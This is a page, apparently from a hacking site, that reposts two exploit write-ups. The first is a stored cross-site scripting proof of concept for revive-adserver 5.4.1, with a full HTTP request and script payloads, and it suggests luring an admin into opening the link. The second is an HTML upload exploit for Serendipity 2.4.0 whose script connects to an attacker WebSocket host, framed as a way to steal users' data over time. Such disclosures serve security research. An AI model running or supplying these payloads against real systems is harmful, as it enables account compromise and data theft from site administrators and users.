revive-adserver v5.4.1 - Cross-Site Scripting (XSS)

HACKER · %s · %s

Exploit Title: revive-adserver v5.4.1 - Cross-Site Scripting (XSS) Application: revive-adserver Version: 5.4.1 Bugs: XSS Technology: PHP Vendor URL: https://www.revive-adserver.com/ Software Link: https://www.revive-adserver.com/download/ Date of found: 31-03-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to create banner 2. select the advanced section 3. Write this payload in the prepend and append parameters (%3Cscript%3Ealert%281%29%3C%2Fscript%3E) POST /www/admin/banner-advanced.php HTTP/1.1 Host: localhost Content-Length: 213 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: sessionID=5224583cf474cd32d2ef37171c4d7894 Connection: close clientid=3&campaignid=2&bannerid=2&token=94c97eabe1ada8e7ae8f204e2ebf7180&prepend=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&append=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submitbutton=De%C4%9Fi%C5%9Fiklikleri+Kaydet We are sending this link to the admin. then if admin clicks it will be exposed to xss http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2
HireHackking

Serendipity 2.4.0 - File Inclusion RCE

HACKER · %s · %s

## Exploit Title: Serendipity 2.4.0 - File Inclusion RCE ## Author: nu11secur1ty ## Date: 04.26.2023 ## Vendor: https://docs.s9y.org/index.html ## Software: https://github.com/s9y/Serendipity/releases/tag/2.4.0 ## Reference: https://portswigger.net/web-security/file-upload ## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload ## Description: The already authenticated attacker can upload HTML files on the server, which is absolutely dangerous and STUPID In this file, the attacker can be codding a malicious web-socket responder that can connect with some nasty webserver somewhere. It depends on the scenario, the attacker can steal every day very sensitive information, for a very long period of time, until the other users will know that something is not ok with this system, and they decide to stop using her, but maybe they will be too late for this decision. STATUS: HIGH Vulnerability [+]Exploit: ```HTML <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>NodeJS WebSocket Server</title> </head> <body> <h1>You have just sent a message to your attacker,<br> <h1>that you are already connected to him.</h1> <script> const ws = new WebSocket("ws://attacker:8080"); ws.addEventListener("open", () =>{ console.log("We are connected to you"); ws.send("How are you, dear :)?"); }); ws.addEventListener('message', function (event) { console.log(event.data); }); </script> </body> </html> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/s9y/2023/Serendipity-2.4.0) ## Proof and Exploit: [href](https://streamable.com/2s80z6) ## Time spend: 01:27:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=nu11secur1ty <http://nu11secur1ty.com/>